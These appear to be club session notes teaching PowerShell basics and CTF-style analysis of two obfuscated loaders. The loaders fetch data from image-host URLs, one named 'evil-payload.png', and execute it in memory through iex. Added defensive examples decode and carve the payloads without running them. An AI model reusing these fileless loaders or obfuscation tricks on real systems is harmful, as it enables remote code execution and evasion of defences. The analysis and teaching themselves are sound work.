# Fifth Club Session
###### tags: `1091`

Topic: PowerShell
Speaker: Still
Slides: [link](https://1drv.ms/p/s!AjOrJMOIR6BMjcAublJeRAjqy-mxPQ?e=XPsYpZ)
LICENSE CC-BY-SA

## PowerShell types
* Windows PowerShell (`powershell.exe`)
  * shipped with Windows 7 and later; the default shell on Windows 10
* PowerShell Core (`pwsh`)
  * cross-platform (e.g. Linux), built on .NET Core

## PowerShell characteristics
* Accepts base64-encoded commands (Encoded Commands) --> <font color=red>super cool</font>
  * e.g. `powershell.exe -noprofile -enc "<base64>"`
  * the thing that gets base64-encoded is the script as UTF-16LE ("Unicode") bytes, not UTF-8; `powershell.exe -?` describes this under `-EncodedCommand`
* .NET calls
  * e.g. `[System.Console]::WriteLine("Hello World!")`
  * [.NET API](https://docs.microsoft.com/zh-tw/dotnet/api/)
* An incredible hacker tool
  * executes code without touching the disk: a payload fetched over the network can be decoded and run entirely in memory
  * as far as the OS can tell, all that happened is a shell script running; file-based scanners have nothing to scan (PowerShell 5+ does hand script blocks to AMSI and can record them with Script Block Logging, so "fileless" is not the same as "invisible")

## What PowerShell is used for
* calling the Win32 API
* calling and creating .NET objects
* executing .NET calls or methods
* inspecting the OS environment variables
  * `ls env:` (there is no `env` command; `env:` is a PowerShell drive, see below)

## PowerShell basic commands
* Command conventions
  * PowerShell commands are called "cmdlets"
  * commands are case-insensitive
  * listing commands: `get-verb`, `get-alias`
  * defining an alias: `set-alias [alias] [command name]`
  * the escape character is the backtick (\`) rather than backslash (\\)
    * e.g. `` echo "`n" ``
* `ls`
* `cd`
* `rm`
* Get-Verb
  * verb + group
  * groups
    * Common
    * Data
    * Lifecycle
    * Diagnostic
    * Security
    * Communications
    * Other
* Get-Alias
  * cat -> Get-Content
  * ls -> Get-ChildItem
* `$_` (the current pipeline object)
  * `ls | %{rm $_ }`
* env
  * `$env:ProgramFiles`
  * `$env:comspec`
  * `$env:ProgramFiles[9] + $env:ProgramFiles[14] + $env:comspec[7]`
    * indexing a string yields a single `[char]`, and `+` on two chars concatenates them; which letters you get depends on the actual paths (`C:\Program Files` and `C:\Windows\system32\cmd.exe` on a default English install), which is why obfuscated scripts love this trick
  * `ls env:` lists the system environment variables
* `powershell -?` (built-in usage text)
* `iex` (Invoke-Expression): evaluates a string as a PowerShell command, so a command assembled from pieces (e.g. indexed characters) can be executed
  * inherently dangerous: whatever ends up in the string runs
  * e.g. `iex ($env:ProgramFiles[13] + $env:ProgramFiles[15])` runs `ls` on a default English install, where `$env:ProgramFiles` is `C:\Program Files` (index 13 is `l`, index 15 is `s`; the indices 9 and 13 quoted in the session would give `m` and `l`)
* `help [Command Name]` (the equivalent of `man` on Linux)
* Making .NET calls
```
> [System.Text.Encoding]::utf8.getbytes("asdf")
```
```
> $a = [System.Text.Encoding]::utf8.getbytes("asdf")
> [System.Convert]::ToBase64String($a)
YXNkZg==
```

## Writing "Hello World!" in PowerShell (everyone is welcome to share their own version)
* with echo
```powershell
echo "Hello World!"
```
* with a .NET call (C#)
```powershell
[System.Console]::WriteLine("Hello World!`n")
```
* with string concatenation
```powershell
"Hello " + "World!`n"
```

## Encoded Commands
A script can be base64-encoded and handed to PowerShell as an encoded command (`-EncodedCommand`), which decodes and runs it; the base64 is taken over the script's UTF-16LE bytes.

## .NET calls
https://paste.stillu.cc/v/6722109161853984769#JxWY+0tbiT16awDn11gykd5txCAt7Scgh/Z+d3c8I00=
https://www.base64decode.org/

## Exercise 1
Challenge
```=
powershell.exe -noprofile -enc "<encoded command not preserved on this page>"
```
Decoded base64
```powershell=
$wc = [sYStEM.net.WEBCLIeNt]::neW();
$Fs = [SYstEM.iO.meMorYSTrEAm]$Wc.dOwNLoaddatA('htTpS://'+$enV:progRAMFIles[12] + '.ibb.'+ $Env:ComspEC[20]+'O/T2v'+[CHAR]57+'62Z/evIl-PAYlOAD.P'+$ENv:coMsPec[5]+ 'g');
$FS.seEk(0X2d78, [System.IO.SEEKORIGin]::BEgIn);
$gzkkjw = [BYte[]]::NEW(0x47);
$fs.ReaD($gzkkjw, 0, $gzkkjw.lENGTh);
$fs.closE();
[SYStEM.TeXt.eNcODing]::UTF8.GETSTrInG($gzkkjw)|IeX
```
```
line 2: htTpS://i.ibb.cO/T2v962Z/evIl-PAYlOAD.PNg
        https://i.ibb.co/T2v962Z/evil-payload.png
```
(`$env:ProgramFiles[12]` is `i`, `$env:ComSpec[20]` is `c`, `[char]57` is `9`, `$env:ComSpec[5]` is `n`; PowerShell type names and method names are case-insensitive, which is why the random casing still runs.)

What this code does:
1. create a WebClient
2. use it to download the PNG at that URL as a byte array and wrap it in a MemoryStream (nothing is written to disk)
3. move the stream position to offset 0x2d78 from the start, like `fseek()` in C
4. create a new byte array of length 0x47 named $gzkkjw
5. read 0x47 bytes from that position into $gzkkjw
6. close the stream
7.
   decode $gzkkjw as UTF-8 and execute the resulting string with iex (the script is hidden inside an otherwise ordinary image at a fixed offset; only those 0x47 bytes are ever treated as code)

## Exercise 2
Challenge
```
<encoded command not preserved on this page>
```
Decoded base64
```powershell=
IEx([sTrINg]::joIn( '',([rEGex]::MATchEs( " ) )'$',)65]raHC[+75]raHC[+45]raHC[((EcAlpeR.)43]raHC[]gNIrTS[,'X2z'(EcAlpeR.)'X2zgepj.Q3ZLmnJ/moc.rugmi.i//:sptthX2z = lrUegami896'(( )''nIOj-'X'+]3,1[)ecNEREfeRPesOBRev$]GNiRtS[( ( &" , '.' , 'RIgHTTOLEft' ) | FOrEach-oBject {$_.ValuE} ) ) );
. ($ENv:cOmSpEC[4,15,25]-joIN'') ( neW-obJeCT sySTeM.iO.sTReAMrEADeR(( neW-obJeCT Io.COMPrEsSIoN.DEflAtEsTREam([Io.MemoRysTream][CoNvErT]::fROMbASe64STRINg(
    'U6kuSPBPSzBMTK9VsFVQCvCoNvCItzRwiQdSGanJ2fGG5qbxaYY5rjmupqa1SgA=') , [iO.CoMpreSsion.cOMPrESsiONmOdE]::deCOmPRESs)) ,[TEXt.ENcoDinG]::AsCIi) ).REAdToEnd( );
$ws = [System.Net.WebClient]::new();
$ws.DownloadFile($imageUrl, [System.IO.Path]::GetTempFileName() );
$iex ((Get-Command ("wR" + ((gi EnV:pUb`L`ic).value[ ([Math]::round( [Int]::MaxValue /101239321) - 9) + (([int]::MaxValue % [int]::MinValue % [int][char]2))] ) + "te"+ [char]45 +"Ou*")).CmdletBinding + '"' + ((gv ('pOf'+ (([long]::MaxValue-[int]::MaxValue).tostring()[16]) + 'ag')).value) +'"') > $null
```
```
line 1: assigns the URL to a variable
        $imageUrl = "https://i.imgur.com/JnmLZ3Q.jpeg"
```
How line 1 gets there: `[regex]::Matches(<string>, '.', 'RightToLeft')` returns the characters starting from the end, so joining the matches reverses the quoted string. Reversed (and case-folded here for readability) it reads `& ( ([String]$VerbosePreference)[1,3]+'X'-join'' ) ( '698imageUrl = z2Xhttps://i.imgur.com/JnmLZ3Q.jpegz2X'.Replace('z2X',[String][Char]34).Replace(([Char]54+[Char]57+[Char]56),'$') )`. `$VerbosePreference` defaults to `SilentlyContinue`, whose characters 1 and 3 are `i` and `e`, so the call operator `&` invokes `ieX`; `[char]34` is `"` and `[char]54+[char]57+[char]56` is `698`, which turns the marker string into the assignment above.

line 2: `$env:ComSpec[4,15,25] -join ''` is `iex` (from `C:\Windows\system32\cmd.exe`). The base64 string is a DeflateStream blob: it is decompressed through StreamReader -> DeflateStream -> MemoryStream and dot-sourced, so whatever the decompressed text defines lands in the current scope for the later lines.
```
line 6: gi -> Get-Item
        $iex ((Get-Command ("wRite-Ou*")...
        gv -> Get-Variable
```
The index arithmetic on line 6: `(gi env:public).value` is `C:\Users\Public`; `[Math]::Round([int]::MaxValue / 101239321) - 9` is `21 - 9 = 12`, and `[int]::MaxValue % [int]::MinValue % [int][char]2` is `1`, so index 13 of that path gives `i` and the Get-Command argument is `wRite-Ou*` (`[char]45` is `-`), i.e. Write-Output. `([long]::MaxValue - [int]::MaxValue).ToString()[16]` is `1`, so the variable read out with gv is `$pOf1ag`.

> PH{0H_90D_0H_heck_175_f1lElE55}

---
Footer discussion

> WHERE IS THE "SLIDE"??
> https://1drv.ms/p/s!AjOrJMOIR6BMjcAublJeRAjqy-mxPQ?e=XPsYpZ :+1:

Where is the technical documentation?
> https://docs.microsoft.com/en-us/dotnet/api/
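An added example for the Encoded Commands section, not from the slides: it builds an `-EncodedCommand` string the way `powershell.exe` expects it (base64 of UTF-16LE bytes, which is why the UTF-8 recipe that gives `YXNkZg==` for `asdf` would not run under `-enc`), decodes one back, and extracts the payload from a process command line so it can be read instead of executed. The command line is constructed; the function names are this example's own.

```powershell
# Added example, not from the slides: encode a script the way -EncodedCommand
# expects it, decode one back, and pull the encoded payload out of a process
# command line. -enc wants base64 of the script's UTF-16LE ("Unicode") bytes.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Script)   # UTF-16LE, not UTF-8
    [System.Convert]::ToBase64String($bytes)
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    $bytes = [System.Convert]::FromBase64String($Base64)
    [System.Text.Encoding]::Unicode.GetString($bytes)
}

function Get-EncodedCommandFromCommandLine {
    # powershell.exe accepts -EncodedCommand, -e, -ec and longer prefixes such
    # as -enc, so match -e optionally followed by c or n... and then a base64 blob.
    param([Parameter(Mandatory)][string]$CommandLine)
    $m = [regex]::Match($CommandLine, '(?i)\s-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]+)"?')
    if ($m.Success) { ConvertFrom-EncodedCommand $m.Groups[1].Value }
}

# Operator side: the blob you would pass as
#   powershell.exe -NoProfile -EncodedCommand <blob>
$blob = ConvertTo-EncodedCommand 'Write-Output "Hello World!"'
$blob

# Defender side: a constructed command line as it would show up in a process
# creation event (Sysmon 1 / Security 4688). Decode it and read it; never
# paste it into a shell to "see what it does".
$sample = "powershell.exe -noprofile -w hidden -enc $blob"
Get-EncodedCommandFromCommandLine $sample
```

Decoding with `[System.Text.Encoding]::UTF8` instead of `Unicode` is the usual mistake in the other direction: the result looks like the script with a null byte after every character.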
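An added example for Exercise 1, not part of the exercise or its sample: the carving step reproduced offline. A constructed byte array (PNG signature, zero filler, text at offset 0x2d78) stands in for the downloaded image, the same MemoryStream Seek/Read sequence extracts the hidden bytes, and the result is displayed rather than piped to `IeX`. A second function scans for printable runs for the case where the offset is not known in advance. Offsets, payload text and function names are this example's own assumptions.

```powershell
# Added example, not part of the exercise: Exercise 1's carving step, offline,
# with a constructed byte array standing in for the PNG and no Invoke-Expression.

# --- constructed "image": PNG signature, zero filler, script at a fixed offset
$PayloadOffset = 0x2d78                                  # same offset as the sample
$hidden = [System.Text.Encoding]::UTF8.GetBytes('Write-Output "this is where the payload would run"')
$image  = [byte[]]::new($PayloadOffset + $hidden.Length + 0x100)
$pngSig = [byte[]](0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A)
[Array]::Copy($pngSig, 0, $image, 0, $pngSig.Length)
[Array]::Copy($hidden, 0, $image, $PayloadOffset, $hidden.Length)

function Get-CarvedScript {
    # Mirrors lines 2-6 of the sample plus the UTF-8 decode, minus the |IeX.
    param([byte[]]$Bytes, [int]$Offset, [int]$Length)
    $fs = [System.IO.MemoryStream]::new($Bytes)
    $null = $fs.Seek($Offset, [System.IO.SeekOrigin]::Begin)
    $buf  = [byte[]]::new($Length)
    $read = $fs.Read($buf, 0, $buf.Length)
    $fs.Close()
    [System.Text.Encoding]::UTF8.GetString($buf, 0, $read)
}

function Find-PrintableRuns {
    # For an unknown offset: a strings(1)-style scan for runs of printable
    # ASCII, which is how script text embedded in a binary image shows up.
    param([byte[]]$Bytes, [int]$MinLength = 16)
    $start = -1
    for ($i = 0; $i -le $Bytes.Length; $i++) {
        $printable = ($i -lt $Bytes.Length) -and ($Bytes[$i] -ge 0x20) -and ($Bytes[$i] -le 0x7E)
        if ($printable -and $start -lt 0) { $start = $i; continue }
        if (-not $printable -and $start -ge 0) {
            $len = $i - $start
            if ($len -ge $MinLength) {
                [pscustomobject]@{
                    Offset = '0x{0:x}' -f $start
                    Length = $len
                    Text   = [System.Text.Encoding]::ASCII.GetString($Bytes, $start, $len)
                }
            }
            $start = -1
        }
    }
}

# Known offset and length (the sample hard-codes 0x2d78 / 0x47):
Get-CarvedScript -Bytes $image -Offset $PayloadOffset -Length $hidden.Length

# Unknown offset: scan the whole blob. In a real PNG the filler is compressed
# chunk data rather than zeros, so expect a few short false-positive runs too.
Find-PrintableRuns -Bytes $image
```

When you meet a sample like this in the wild, the same rule applies to the real image: download it with a tool that cannot execute anything, carve with `Get-CarvedScript`, and read the text. Replacing the trailing `|IeX` with `| Write-Output` is the quick version of the same idea.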
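An added example for Exercise 2, not part of the exercise or its sample: the two string-hiding tricks on lines 1 and 2 (right-to-left regex reversal with marker substitution, and a base64-encoded DeflateStream blob) shown from both sides. The packing side uses a constructed script and a constructed URL; the unpacking side makes the same calls as the sample but prints the result instead of handing it to `&` or `iex`. Function names are this example's own.

```powershell
# Added example, not part of the exercise: Exercise 2's reversal and deflate
# tricks, packed from a constructed script and unpacked without executing.

function ConvertTo-ReversedString {
    param([Parameter(Mandatory)][string]$Text)
    # Same trick as line 1 of the sample: match each char right-to-left, join.
    [string]::Join('', ([regex]::Matches($Text, '.', 'RightToLeft') | ForEach-Object { $_.Value }))
}

function ConvertTo-DeflateBase64 {
    param([Parameter(Mandatory)][string]$Text)
    $ms = [System.IO.MemoryStream]::new()
    $ds = [System.IO.Compression.DeflateStream]::new($ms, [System.IO.Compression.CompressionMode]::Compress)
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Text)
    $ds.Write($bytes, 0, $bytes.Length)
    $ds.Close()                                   # flushes the deflate block
    [System.Convert]::ToBase64String($ms.ToArray())
}

function ConvertFrom-DeflateBase64 {
    param([Parameter(Mandatory)][string]$Base64)
    # Same reader chain as line 2 of the sample (StreamReader over DeflateStream
    # over MemoryStream), returned as text instead of dot-sourced through iex.
    $ms = [System.IO.MemoryStream]::new([System.Convert]::FromBase64String($Base64))
    $ds = [System.IO.Compression.DeflateStream]::new($ms, [System.IO.Compression.CompressionMode]::Decompress)
    $sr = [System.IO.StreamReader]::new($ds, [System.Text.Encoding]::ASCII)
    $sr.ReadToEnd()
}

# --- stage 1: the reversed line, with the sample's markers (z2X stands for
# the double quote, 698 for the dollar sign). URL constructed for the example.
$plain  = '$imageUrl = "https://example.invalid/picture.jpeg"'
$obfusc = ConvertTo-ReversedString ($plain.Replace('"', 'z2X').Replace('$', '698'))
$obfusc

# Analyst side: undo the reversal and the substitutions, then look at it.
$quote  = [string][char]34
$dollar = -join ([char]54, [char]57, [char]56)   # "698"
$stage1 = (ConvertTo-ReversedString $obfusc).Replace('z2X', $quote).Replace($dollar, '$')
$stage1

# --- stage 2: the deflate blob. Pack a constructed script, then unpack it the
# way line 2 does, but display it instead of running it.
$blob = ConvertTo-DeflateBase64 '$pOf1ag = "whatever line 6 later reads back"'
$blob
ConvertFrom-DeflateBase64 $blob
```

The general habit this illustrates: every obfuscation layer in the sample ends in an invoking gadget (`&`, `. iex`, `$iex`). Evaluate the argument expression on its own, print it, and only then decide what the next layer is; the decompressed stage-2 text of the real sample can be obtained the same way by passing its base64 string to `ConvertFrom-DeflateBase64`.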